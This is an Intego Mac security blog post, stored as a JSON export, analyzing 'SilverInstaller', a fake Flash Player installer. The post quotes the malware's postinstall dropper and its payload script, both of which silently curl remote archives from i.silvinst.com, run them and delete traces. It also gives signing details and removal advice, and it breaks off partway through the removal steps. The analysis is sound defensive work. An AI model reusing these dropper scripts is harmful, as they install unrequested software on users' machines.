{"id":58495,"date":"2016-10-18T15:47:35","date_gmt":"2016-10-18T22:47:35","guid":{"rendered":"https:\/\/www.intego.com\/mac-security-blog\/?p=58495"},"modified":"2016-10-25T09:27:02","modified_gmt":"2016-10-25T16:27:02","slug":"silverinstaller-uses-new-techniques-to-install-puapup","status":"publish","type":"post","link":"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/","title":{"rendered":"SilverInstaller Uses New Techniques to Install PUA\/PUP"},"content":{"rendered":"

\"SilverInstaller-Fake-Flash-Player-Update-Header\"<\/a>
\nToday malware researchers at Intego have discovered a new fake Adobe Flash Player installer, which Intego has labeled “SilverInstaller.” These types of installers are nothing new these days and usually result in the same or similar adware to infect a system. Some examples are Flashback<\/a>, ClickAgent<\/a>, InstallMiez and InstallCore<\/a>. This behavior was expected of SilverInstaller as well, but during analysis Intego observed that it\u00a0behaved differently than those fake Flash Player installers we have seen in the past.<\/p>\n

How is the user presented with the fake Adobe Flash Player update?\u00a0<\/strong><\/p>\n

The methods used into tricking the user to download and install the installer are familiar, a website pop-up showing there is a new version of Flash Player available is presented. This can look like this:
\n
\n<\/a>\"SilverInstaller-Fake-Flash-Player-Web-Pop-Up\"<\/a>Or like this:
\n\"SilverInstaller-Web-Pop-Up-Image\"<\/a>
\n<\/a>These fake Flash Player pop-ups come in many shapes and sizes but can be\u00a0recognized as fakes when compared to the real thing, and SilverInstaller\u00a0is\u00a0no different. If the “Update” or “Download” button is clicked, however, things become\u00a0a bit more interesting.\u00a0The file that is downloaded is named “FlashPlayer_01.30.pkg” and looks like a generic package file. The numbers that are appended to the FlashPlayer name differ every time the file is downloaded though, so no-one will have the same file name twice.
\n
\n<\/a>\"SilverInstaller-Download-Package\"<\/a>Each downloaded package, when analyzed, has\u00a0a unique hash and their contents are similar with the same hierarchy and an embedded bundle package.<\/p>\n

One of the things these installers do have in common is the Developer ID they are signed with, in this case belonging to “adam Chemill (FAFK4ARNVL).”<\/p>\n

\n
Package “FlashPlayer_01.8.pkg”:<\/div>\n
\u00a0 \u00a0Status: signed by a certificate trusted by Mac OS X<\/div>\n
\u00a0 \u00a0Certificate Chain:<\/div>\n
\u00a0 \u00a0 1.\u00a0Developer ID Installer: adam Chemil (FAFK4ARNVL)<\/b><\/div>\n
\u00a0 \u00a0 \u00a0 \u00a0SHA1 fingerprint: AA C5 81 EE B4 EF 0B CE A1 A1 D2 92 97 75 9E 0E 04 EB 02 31<\/div>\n
\u00a0 \u00a0 \u00a0 \u00a0—————————————————————————–<\/div>\n
\u00a0 \u00a0 2. Developer ID Certification Authority<\/div>\n
\u00a0 \u00a0 \u00a0 \u00a0SHA1 fingerprint: 3B 16 6C 3B 7D C4 B7 51 C9 FE 2A FA B9 13 56 41 E3 88 E1 86<\/div>\n
\u00a0 \u00a0 \u00a0 \u00a0—————————————————————————–<\/div>\n
\u00a0 \u00a0 3. Apple Root CA<\/div>\n
\u00a0 \u00a0 \u00a0 \u00a0SHA1 fingerprint: 61 1E 5B 66 2C 59 3A 08 FF 58 D1 4A E2 24 52 D1 98 DF 6C 60<\/div>\n<\/blockquote>\n

Installing the contents:\u00a0<\/strong><\/p>\n

When the package file is opened, surprisingly the Adobe Flash charade\u00a0ends.
\n\"SilverInstaller-Installer\"<\/a>
\nThe installer does not attempt to present itself as an actual Flash Player installer, but instead shows “Install SilverInstaller.” SilverInstaller is a facilitator for the downloading and installation of other content, as the readme shows. MacKeeper, DavinciSearch and MegaBackup are three names mentioned, names you may have seen in the past related to potentially unwanted applications (PUA).\u00a0When the installation is completed, in this case, none of the mentioned applications can be found on the system. What does pop-up shortly after is an Player OS X Extended window.
\n\"SilverInstaller-MPlayer\"<\/a>
\nThe installation does not actually write the dropped\u00a0files to the system, it’s the PostInstall script (the dropper) that silently starts the Payload\u00a0download in the background.<\/p>\n

\n
$ cat \/FlashPlayer_XX.X\/base.pkg\/Scripts\/postinstall<\/span><\/div>\n
#!\/bin\/bash<\/span><\/div>\n
\u00a0<\/span><\/div>\n
func_act(){<\/span><\/div>\n
\u00a0 \u00a0 OS_Version=$(sw_vers -productVersion)<\/span><\/div>\n
\u00a0 \u00a0 if [[ ${OS_Version} == 10.12 ]]; then<\/span><\/div>\n
\u00a0 \u00a0 \u00a0 \/usr\/bin\/curl -s -L -o \/var\/tmp\/act.tgz “http:\/\/i.silvinst.com\/is\/cact?i=”d353b8d8-71f5-4f17-9e16-5ce1d13491a3″&ve=10.12”<\/span><\/div>\n
\u00a0 \u00a0 else<\/span><\/div>\n
\u00a0 \u00a0 \u00a0 \/usr\/bin\/curl -s -L -o \/var\/tmp\/act.tgz “http:\/\/i.silvinst.com\/is\/cact?i=”d353b8d8-71f5-4f17-9e16-5ce1d13491a3″”<\/span><\/div>\n
\u00a0 \u00a0 fi<\/span><\/div>\n
\u00a0 \u00a0 tar -xzf \/var\/tmp\/act.tgz -C \/var\/tmp<\/span><\/div>\n
\u00a0 \u00a0 \/var\/tmp\/act\/act “2712c147-7e15-4366-80e0-4c7b98d780f0” “d353b8d8-71f5-4f17-9e16-5ce1d13491a3”<\/span><\/div>\n
\u00a0 \u00a0 sleep 120<\/span><\/div>\n
\u00a0 \u00a0 rm -rf \/var\/tmp\/act\/act<\/span><\/div>\n
\u00a0 \u00a0 rm -rf \/var\/tmp\/act.tgz<\/span><\/div>\n
}<\/span><\/div>\n<\/blockquote>\n

It checks to see if the Mac is running macOS 10.12 Sierra or another version of OS X and selects a download URL accordingly to download the Payload from.<\/p>\n

The Payload<\/strong><\/p>\n

The Dropper downloads the Payload, which is then responsible for opening a connection to “http:\/\/i.silvinst.com” on port 80 and a shell script is then executed. The script then finishes the job by downloading the MPlayer archive to the Mac and launching the application as seen in the screenshot above.
\n<\/span><\/span><\/p>\n

\n
cat \/01\/install_unit.sh<\/span><\/div>\n
#!\/bin\/bash<\/span><\/div>\n
func_0(){<\/span><\/div>\n
\/usr\/bin\/curl -s -L -o \/var\/tmp\/MPlayer.zip “http:\/\/i.silvinst.com\/static\/mplayer\/MPlayer.zip”<\/span><\/div>\n
cd \/var\/tmp<\/span><\/div>\n
\/usr\/bin\/unzip \/var\/tmp\/MPlayer.zip<\/span><\/div>\n
\/bin\/chmod 777 “\/var\/tmp\/MPlayer OSX Extended.app\/”<\/span><\/div>\n
cp -rf \/var\/tmp\/MPlayer\\ OSX\\ Extended.app \/Applications\/<\/span><\/div>\n
\/bin\/chmod 777 “\/Applications\/MPlayer OSX Extended.app”<\/span><\/div>\n
\/bin\/sleep 5<\/span><\/div>\n
\/usr\/bin\/open “\/Applications\/MPlayer OSX Extended.app”<\/span><\/div>\n
\/usr\/bin\/curl -s -L -o \/var\/tmp\/re.txt “http:\/\/i.silvinst.com\/is\/if?i=7f12bd20-efa1-4198-a1bd-8a64ef7436c4”<\/span><\/div>\n
}<\/span><\/div>\n
func_0 &
\n<\/span><\/div>\n<\/blockquote>\n

In this case the downloaded application is harmless and public exposure is not expected to be very widespread.\u00a0This installer was encountered on a bittorrent website which is not known for providing legal or high quality content. What should be watched though is the way the installer works, as this can evolve and be used to download much more malicious contents. In it’s current form the installer is already more sophisticated than the known InstallCore \/ InstallMiez \/ InstallImitator installers we have encountered in the past.<\/p>\n

What steps can Mac users take to protect their computers?<\/strong><\/p>\n

Only download software from reliable sources. If a website prompts for an Adobe Flash Player update, close the prompt and visit Adobe’s website instead to download it there. We recommend not using Adobe Flash Player at all, but if you do need it, make sure you’re as safe as possible when updating the Adobe software<\/a> by grabbing\u00a0it from the right source.<\/p>\n

Manually removing SilverInstaller<\/strong><\/p>\n

If infected, Mac users can manually remove the SilverInstaller\u00a0files to clean up the infection. From the Finder menu “Go,” select “Go to Folder” and copy\/paste the following path:<\/p>\n